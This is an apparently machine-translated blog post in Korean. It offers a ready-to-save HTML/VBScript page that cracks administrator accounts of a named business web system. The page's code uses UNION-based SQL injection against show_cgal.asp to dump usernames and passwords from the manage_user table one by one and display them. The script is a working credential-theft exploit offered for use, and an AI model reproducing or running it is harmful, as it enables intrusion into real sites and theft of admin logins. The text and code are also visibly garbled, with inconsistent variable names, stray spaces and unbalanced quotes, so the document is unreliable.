/*자근 강http://blog.csdn.net/cqq */지난번 에 하늘의 비 즈 니스 시스템 해독 절 차 를 쓴 이후로 많은 친구 들 의 편 지 를 받 았 습 니 다.절차 원 리 를 묻 는 사람 도 있 고 어떻게 보호 하 는 지 묻 는 사람 도 있 습 니 다.오늘 저 는 시간 을 좀 내 서 이 Html 버 전 을 만 들 었 습 니 다.이 htm 파일 만 html 지식 과 SQL 이 있다 고 믿 습 니 다. Injection 지식 을 가 진 친구 들 은 원 리 를 이해 할 수 있 습 니 다.매우 간단 합 니 다.사용자 계 정 을 푸 는 데 사용 하 는 SQL 입 니 다. 이 시스템 에는 sql 이 많이 존재 하기 때문에 Injection 방법 injection 구멍,그리고 스스로 이 시스템 을 다운로드 하면 문 제 를 쉽게 찾 을 수 있 습 니 다.이전 에는 Vc++버 전 이 었 는데 지금 은 html 버 전 입 니 다.그러나 모두 똑 같 습 니 다.http 프로 토 콜 을 통 해 웹 페이지 의 원본 파일 을 얻 은 다음 에 원본 파일 을 분석 하여 사용자 이름과 비밀 번 호 를 찾 아 표시 합 니 다.다음은 소스 코드 입 니 다.여러분 은 이 파일 을 하 드 디스크 에 저장 하고 ty.htm 라 고 이름 을 지 으 면 됩 니 다.
천의 비 즈 니스 시스템 배경 관리 계 정 해독 html 버 전--자근 강 제작Function bytes2BSTR(vIn)strReturn="For i=1 To LenB(vIn)ThisCharCode=Ascb(MidB(vIn,i,1)If ThisCharCode<&H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function Sub OpenUrl(strUrl) strTmp = "" strUser = "!" strAAA ="" strCqq="" i=0 on Error Resume Next While Trim(strUser) <> "" strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2" Set xmlhttp = CreateObject("Microsoft.XMLHTTP") xmlhttp.open "GET",(strUrl + strPara),false xmlhttp.send strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "", "") If Trim(strAAA) <> "" Then arr = Split(strAAA,"**")strUser=arr(0)strCqq=strCqq+vbNewLine+"사용자 이름:"+strUser+vbNewLine+"비밀번호:"+arr(1)+vbNewLine+vbNewLine Else strUser=""End If//msgbox xmlhttp.Response Set xmlhttp=Nothing Wend If strCq<>"Then strCq="해 제 된 백그라운드 관리 계 정 은 다음 과 같 습 니 다.주소:"+strUrl+"/admin)"+vbCrLF+VBCRLF+strCq+vbnewline cqadmin.innerText=strCq Else cqadmin.innerText="오류"End If End Sub Function getMid(str,str1,str2)str 11="i=InStr(str,str1)If i>0 Then j=InStr(i,str,str 2)If j>0 Then str 11=Mid(str,i+Len(str 1), j - i - Len(str1)) End If End If getMid = str11 End Function p>
[Ctrl+A 선택:
외부 Js 를 도입 하려 면 페이지 를 새로 고침 해 야 실행 할 수 있 습 니 다.]
